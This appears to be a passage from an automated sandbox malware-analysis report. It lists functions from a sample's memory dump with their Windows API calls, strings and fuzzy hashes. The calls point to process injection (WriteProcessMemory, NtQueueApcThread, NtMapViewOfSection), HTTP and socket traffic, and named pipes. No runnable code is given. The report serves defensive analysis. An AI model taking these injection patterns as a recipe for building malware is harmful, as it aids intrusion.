_snprintf.LIBCMT ref: 0000017DEA72EA1A

Part of subcall function 0000017DEA73B5DC: _flsbuf.LIBCMT ref: 0000017DEA73B67D

HttpOpenRequestA.WININET ref: 0000017DEA72EA66
HttpSendRequestA.WININET ref: 0000017DEA72EA99
InternetCloseHandle.WININET ref: 0000017DEA72EAAE
Sleep.KERNEL32 ref: 0000017DEA72EAB9
InternetCloseHandle.WININET ref: 0000017DEA72EACC

Strings

%s%s, xrefs: 0000017DEA72EA0F
*/*, xrefs: 0000017DEA72E8FA

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep_errno_flsbuf_invalid_parameter_noinfo
String ID: %s%s$*/*
API String ID: 3364845851-856325523
Opcode ID: 0694fbe2251f325486d7db104ce5f9bbd3e0ba48dceb4aa3373eff9f8ea386f1
Instruction ID: bfe524befdd68090ceef32372e0f93fb4b6b3a589d8ae6843b020873730046d3
Opcode Fuzzy Hash: 0694fbe2251f325486d7db104ce5f9bbd3e0ba48dceb4aa3373eff9f8ea386f1
Instruction Fuzzy Hash: A2517072608A4A8AE742EB61F8403F97B71FBC4798F500136DA8D1B795DF38C649C752

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73233C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 113threadsleeplibraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0000017DEA7323A6
GetProcAddress.KERNEL32 ref: 0000017DEA7323B6

Part of subcall function 0000017DEA732258: malloc.LIBCMT ref: 0000017DEA732296
Part of subcall function 0000017DEA732258: VirtualAllocEx.KERNEL32 ref: 0000017DEA7322E1
Part of subcall function 0000017DEA732258: WriteProcessMemory.KERNEL32 ref: 0000017DEA732305
Part of subcall function 0000017DEA732258: free.LIBCMT ref: 0000017DEA73231B

OpenThread.KERNEL32 ref: 0000017DEA732420
CloseHandle.KERNEL32 ref: 0000017DEA732447
Thread32Next.KERNEL32 ref: 0000017DEA732454
CloseHandle.KERNEL32 ref: 0000017DEA732460
Sleep.KERNEL32 ref: 0000017DEA73246B
ReadProcessMemory.KERNEL32 ref: 0000017DEA73248C
WriteProcessMemory.KERNEL32 ref: 0000017DEA7324BF

Strings

ntdll, xrefs: 0000017DEA732371
NtQueueApcThread, xrefs: 0000017DEA7323AC

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: HandleMemoryProcess$CloseWrite$AddressAllocModuleNextOpenProcReadSleepThreadThread32Virtualfreemalloc
String ID: NtQueueApcThread$ntdll
API String ID: 2809487561-1374908105
Opcode ID: 6afc254592d4cf48379ec8e8f43c23ff634562f8866ac748569cc3e6c81e8475
Instruction ID: dbdc1c77d55d595326eed3e6bfbdad01ace17bf865727b8919031ae5cea1d737
Opcode Fuzzy Hash: 6afc254592d4cf48379ec8e8f43c23ff634562f8866ac748569cc3e6c81e8475
Instruction Fuzzy Hash: FE416932705B0A9AEB12EB61F8443EC23B4BB98788F554135DE8D5BB58DF38CA49C741

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73BDB0 Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA73BDD6

Part of subcall function 0000017DEA73DA10: _getptd_noexit.LIBCMT ref: 0000017DEA73DA14

_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA73BDE2
__crtIsPackagedApp.LIBCMT ref: 0000017DEA73BDF3
AreFileApisANSI.KERNEL32 ref: 0000017DEA73BE02
MultiByteToWideChar.KERNEL32 ref: 0000017DEA73BE28
GetLastError.KERNEL32 ref: 0000017DEA73BE35
_dosmaperr.LIBCMT ref: 0000017DEA73BE3D

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1138158220-0
Opcode ID: 3eec2c287576479eba86d9e5720364ab898d7a35fbd0fd2be876452c635e7a1b
Instruction ID: 19383de3d5794b53cebc74708c4a0405a2997b1a9d5c434f9c46ff880dbe98c4
Opcode Fuzzy Hash: 3eec2c287576479eba86d9e5720364ab898d7a35fbd0fd2be876452c635e7a1b
Instruction Fuzzy Hash: 05313231608B4A86F717FB65A8053B96AF1AFC4B94F2545349A9D4B7D5DF38C6088202

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73BF0C Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 0000017DEA73BF1D
free.LIBCMT ref: 0000017DEA73BF3A

Part of subcall function 0000017DEA73B1E8: HeapFree.KERNEL32 ref: 0000017DEA73B1FE
Part of subcall function 0000017DEA73B1E8: _errno.LIBCMT ref: 0000017DEA73B208
Part of subcall function 0000017DEA73B1E8: GetLastError.KERNEL32 ref: 0000017DEA73B210

free.LIBCMT ref: 0000017DEA73BF4F
free.LIBCMT ref: 0000017DEA73BF70
free.LIBCMT ref: 0000017DEA73BF85
free.LIBCMT ref: 0000017DEA73BF99
free.LIBCMT ref: 0000017DEA73BFA5
free.LIBCMT ref: 0000017DEA73BFD0
EncodePointer.KERNEL32 ref: 0000017DEA73BFD8
free.LIBCMT ref: 0000017DEA73BFF1
free.LIBCMT ref: 0000017DEA73C00A
free.LIBCMT ref: 0000017DEA73C03B

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
String ID:
API String ID: 4099253644-0
Opcode ID: 35aca9194c528ae9650a35c73d1bdbf2d60b0283d2e9458ab8899a63ba071189
Instruction ID: 0f9a328dafe47a5ae107df426060d270c6c25f553c71184431db53dbf513ef71
Opcode Fuzzy Hash: 35aca9194c528ae9650a35c73d1bdbf2d60b0283d2e9458ab8899a63ba071189
Instruction Fuzzy Hash: C7311931219A0F42FB57FB51F8543F82B70AFC47A4FA911359ADE4E2A1CE6887488713

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA735970 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000017DEA73599E
select.WS2_32 ref: 0000017DEA7359F5
__WSAFDIsSet.WS2_32 ref: 0000017DEA735A04
__WSAFDIsSet.WS2_32 ref: 0000017DEA735A1C
GetTickCount.KERNEL32 ref: 0000017DEA735A25
gethostbyname.WS2_32 ref: 0000017DEA735A38
htons.WS2_32 ref: 0000017DEA735A50
inet_addr.WS2_32 ref: 0000017DEA735A62
sendto.WS2_32 ref: 0000017DEA735A8B

Strings

d, xrefs: 0000017DEA7359AF

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
String ID: d
API String ID: 1257931466-2564639436
Opcode ID: 88a0dad43e10c1c2d02976864a9ec383be54b38174a8cea9b784459703743c46
Instruction ID: e2f760da2505dbd0ba092cd21cd34f88fc04c45a5e5e57d2a61cf293d74ea730
Opcode Fuzzy Hash: 88a0dad43e10c1c2d02976864a9ec383be54b38174a8cea9b784459703743c46
Instruction Fuzzy Hash: C5316132228B8A86E762DF11F8443EA77B4FB88794F104125EACD4BB54DF78C644C741

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA342003 Relevance: 16.6, APIs: 11, Instructions: 108COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA342035

Part of subcall function 0000017DEA33CE57: _getptd_noexit.LIBCMT ref: 0000017DEA33CE5B

__doserrno.LIBCMT ref: 0000017DEA34202C

Part of subcall function 0000017DEA33CDE7: _getptd_noexit.LIBCMT ref: 0000017DEA33CDEB

__doserrno.LIBCMT ref: 0000017DEA342092
_errno.LIBCMT ref: 0000017DEA342099
_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA3420FD

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
String ID:
API String ID: 388111225-0
Opcode ID: 203a2b38f817d4d23a6501c1524f63e085a1b9106d7fef7525e1a372d16d7569
Instruction ID: cf0e99fd42bb9a30cd665752d81624ecd4e0acf3fe3f5f2d3915f197e1d41b03
Opcode Fuzzy Hash: 203a2b38f817d4d23a6501c1524f63e085a1b9106d7fef7525e1a372d16d7569
Instruction Fuzzy Hash: 4631967011C74F4EE2676BE8A8427BD7AF0EF85324F110259E46A8B1E3DE749A058293

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA736029 Relevance: 16.6, APIs: 11, Instructions: 99threadCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000017DEA73605E
GetLastError.KERNEL32 ref: 0000017DEA73606C
UpdateProcThreadAttribute.KERNEL32 ref: 0000017DEA7360AC
GetLastError.KERNEL32 ref: 0000017DEA7360B6
CloseHandle.KERNEL32 ref: 0000017DEA7360CB
GetCurrentProcess.KERNEL32 ref: 0000017DEA7360EC
DuplicateHandle.KERNEL32 ref: 0000017DEA736114
GetCurrentProcess.KERNEL32 ref: 0000017DEA73612D
DuplicateHandle.KERNEL32 ref: 0000017DEA736150
GetCurrentProcess.KERNEL32 ref: 0000017DEA73615F
DuplicateHandle.KERNEL32 ref: 0000017DEA736183

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: HandleProcess$CurrentDuplicate$ErrorLast$AttributeCloseOpenProcThreadUpdate
String ID:
API String ID: 2151055714-0
Opcode ID: 0480154427d5172fff179a76570534ed64184663f59270bef32bb2a4aa882687
Instruction ID: 2995cde9d962b99218986967511b6209aa34d40c54a3303ede5b2d3f0b4872cf
Opcode Fuzzy Hash: 0480154427d5172fff179a76570534ed64184663f59270bef32bb2a4aa882687
Instruction Fuzzy Hash: 83417132618B4A86E726DF51A8043EA67B1FBC8BD4F180134DA8D4BB55DF3CC6458706

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA72F6B4 Relevance: 16.6, APIs: 11, Instructions: 91sleepfilepipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000017DEA72F6D5
GetLastError.KERNEL32 ref: 0000017DEA72F72F
GetTickCount.KERNEL32 ref: 0000017DEA72F73A
Sleep.KERNEL32 ref: 0000017DEA72F74A
GetLastError.KERNEL32 ref: 0000017DEA72F757
WriteFile.KERNEL32 ref: 0000017DEA72F78A
WriteFile.KERNEL32 ref: 0000017DEA72F7B9
FlushFileBuffers.KERNEL32 ref: 0000017DEA72F7D1
DisconnectNamedPipe.KERNEL32 ref: 0000017DEA72F7DB
CloseHandle.KERNEL32 ref: 0000017DEA72F7E5
Sleep.KERNEL32 ref: 0000017DEA72F7F0

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: File$CountErrorLastSleepTickWrite$BuffersCloseDisconnectFlushHandleNamedPipe
String ID:
API String ID: 1326360348-0
Opcode ID: 4e79a0a58ab8dddb263587398078cda49ad1039685f1639a7590c56d7c38f5e4
Instruction ID: 6ead29e79f195d12eff422d97749a5abf783d40123460f5429aba92fc4047c84
Opcode Fuzzy Hash: 4e79a0a58ab8dddb263587398078cda49ad1039685f1639a7590c56d7c38f5e4
Instruction Fuzzy Hash: 85417C3270490A8AF712EFB5E4847EC23B1EB84B98F410531DE8D5BA98DF38C609C751

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73288C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85filelibraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0000017DEA7328CF
GetProcAddress.KERNEL32 ref: 0000017DEA7328DF
CreateFileMappingA.KERNEL32 ref: 0000017DEA732908
MapViewOfFile.KERNEL32 ref: 0000017DEA73292F
UnmapViewOfFile.KERNEL32 ref: 0000017DEA732992
CloseHandle.KERNEL32 ref: 0000017DEA73299B
GetLastError.KERNEL32 ref: 0000017DEA7329AB

Strings

NtMapViewOfSection, xrefs: 0000017DEA7328D5
ntdll.dll, xrefs: 0000017DEA7328C1

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: File$HandleView$AddressCloseCreateErrorLastMappingModuleProcUnmap
String ID: NtMapViewOfSection$ntdll.dll
API String ID: 2680503992-3170647572
Opcode ID: 121fe0b491a684415106ec00e2dd0e7d2198fcb60d8a3cefec07f5edc9ae2468
Instruction ID: 664bc3f3b3bfcdfe34c9f460e585ac1e2aae04ad8fccc84750102a2e413f9ed1
Opcode Fuzzy Hash: 121fe0b491a684415106ec00e2dd0e7d2198fcb60d8a3cefec07f5edc9ae2468
Instruction Fuzzy Hash: 99317C32704B4A82EB12EB11B4587A963B0FB88BF4F140635EEAD0B795CF7CC5498701

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA735864 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57networksleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000017DEA735884
select.WS2_32 ref: 0000017DEA7358EA
__WSAFDIsSet.WS2_32 ref: 0000017DEA7358F9
__WSAFDIsSet.WS2_32 ref: 0000017DEA73590E
send.WS2_32 ref: 0000017DEA735924
WSAGetLastError.WS2_32 ref: 0000017DEA73592F
Sleep.KERNEL32 ref: 0000017DEA735941
GetTickCount.KERNEL32 ref: 0000017DEA735947

Strings

d, xrefs: 0000017DEA735892

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: CountTick$ErrorLastSleepselectsend
String ID: d
API String ID: 2152284305-2564639436
Opcode ID: cd5d6b9af6a216c8fb5dee28e8f18bddad3c500ccbeb1af542c6eb1c04d411d5
Instruction ID: b97877744ac9211987c8a55efcc21ad1e773f4aef3f7f8cc788f033983e021d8
Opcode Fuzzy Hash: cd5d6b9af6a216c8fb5dee28e8f18bddad3c500ccbeb1af542c6eb1c04d411d5
Instruction Fuzzy Hash: E421A072218A8A86E762DF21F8443E97370FBC47A0F100135DBDD4BA94DF38C6588B41

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA342DEF Relevance: 15.1, APIs: 10, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA342E1A

Part of subcall function 0000017DEA33CE57: _getptd_noexit.LIBCMT ref: 0000017DEA33CE5B

__doserrno.LIBCMT ref: 0000017DEA342E12

Part of subcall function 0000017DEA33CDE7: _getptd_noexit.LIBCMT ref: 0000017DEA33CDEB

__lock_fhandle.LIBCMT ref: 0000017DEA342E5E
_lseeki64_nolock.LIBCMT ref: 0000017DEA342E77
_unlock_fhandle.LIBCMT ref: 0000017DEA342E9A

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
String ID:
API String ID: 2644381645-0
Opcode ID: 13d5b912aa4b58c8157a7abacb0084aea56df7353009d6a56fe2b8f2328fcb02
Instruction ID: 705fb4e70db530fe39c552bdb33ffbf0e64f537c09b2f4cbb9da8ccbf6a1ab41
Opcode Fuzzy Hash: 13d5b912aa4b58c8157a7abacb0084aea56df7353009d6a56fe2b8f2328fcb02
Instruction Fuzzy Hash: 9D21D23161C60B0EE36B6BD8B8423FD76B4EFC1321F050259E42E8B1E3DE64594582A3

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA342C77 Relevance: 15.1, APIs: 10, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA342CA2

Part of subcall function 0000017DEA33CE57: _getptd_noexit.LIBCMT ref: 0000017DEA33CE5B

__doserrno.LIBCMT ref: 0000017DEA342C9A

Part of subcall function 0000017DEA33CDE7: _getptd_noexit.LIBCMT ref: 0000017DEA33CDEB

__lock_fhandle.LIBCMT ref: 0000017DEA342CE6
_lseek_nolock.LIBCMT ref: 0000017DEA342CFF
_unlock_fhandle.LIBCMT ref: 0000017DEA342D20

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
String ID:
API String ID: 1078912150-0
Opcode ID: 0a90b57d0e0bb32bf9b0256fe91cce560893c6d5b4dbdc2a1a779e5db910b3c4
Instruction ID: f5d8591910671b7590d6b0f7571a6bd80016e843959433dabd93f35878f095cd
Opcode Fuzzy Hash: 0a90b57d0e0bb32bf9b0256fe91cce560893c6d5b4dbdc2a1a779e5db910b3c4
Instruction Fuzzy Hash: 8B21913161C70A4EE22B6BE8A8423FC7AB0DFC2325F150218E47E8B1E3DE6459458297

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA742BBC Relevance: 15.1, APIs: 10, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA742BEE

Part of subcall function 0000017DEA73DA10: _getptd_noexit.LIBCMT ref: 0000017DEA73DA14

__doserrno.LIBCMT ref: 0000017DEA742BE5

Part of subcall function 0000017DEA73D9A0: _getptd_noexit.LIBCMT ref: 0000017DEA73D9A4

__doserrno.LIBCMT ref: 0000017DEA742C4B
_errno.LIBCMT ref: 0000017DEA742C52
_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA742CB6

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
String ID:
API String ID: 388111225-0
Opcode ID: 5e6db6726096af27b66046b2acef74fb063e62aaa520d3154a3709877deb361b
Instruction ID: a8abf8d6d612b71383aac21c2f04bb6b1624f19bff37ce00b91a8e965bede9b9
Opcode Fuzzy Hash: 5e6db6726096af27b66046b2acef74fb063e62aaa520d3154a3709877deb361b
Instruction Fuzzy Hash: 1831D13221C24B46E317FF65B8813BE2970AFC0790F564934A9AA0F7D7CE38CA518742

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA74BC50 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA74BC76
_errno.LIBCMT ref: 0000017DEA74BC6B

Part of subcall function 0000017DEA73DA10: _getptd_noexit.LIBCMT ref: 0000017DEA73DA14

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1812809483-0
Opcode ID: d44fac2e59bc99b4c96033e94abcbe5d8b9df5f97906d86d8397442a6074eaee
Instruction ID: 994d7026f8e18f2ec291e1bdecefbf4581d8c89619c7aedd1f21b1fbbb5ffd33
Opcode Fuzzy Hash: d44fac2e59bc99b4c96033e94abcbe5d8b9df5f97906d86d8397442a6074eaee
Instruction Fuzzy Hash: A941E77260C65B82FB62FB12A5403F92AF0EFE4B94F504171DAD88F6C5DF258E418B02

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7302EC Relevance: 13.6, APIs: 9, Instructions: 109threadinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 0000017DEA7376EC: GetCurrentProcess.KERNEL32 ref: 0000017DEA737704

GetThreadContext.KERNEL32 ref: 0000017DEA730352
GetLastError.KERNEL32 ref: 0000017DEA73035C
ReadProcessMemory.KERNEL32 ref: 0000017DEA73038D
ReadProcessMemory.KERNEL32 ref: 0000017DEA7303B5
VirtualProtectEx.KERNEL32 ref: 0000017DEA7303DF
malloc.LIBCMT ref: 0000017DEA7303F4
free.LIBCMT ref: 0000017DEA73043D
WriteProcessMemory.KERNEL32 ref: 0000017DEA730464
GetLastError.KERNEL32 ref: 0000017DEA73046E

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: Process$Memory$ErrorLastRead$ContextCurrentProtectThreadVirtualWritefreemalloc
String ID:
API String ID: 1437218981-0
Opcode ID: 0837c0be696be076953f626b7cb1ef700a22adb7f3bb4411fff8eaef3d65f62c
Instruction ID: ab4842472b23373bc78f053f957ba34b55bfa81bdb2ea4b44981af31cc849672
Opcode Fuzzy Hash: 0837c0be696be076953f626b7cb1ef700a22adb7f3bb4411fff8eaef3d65f62c
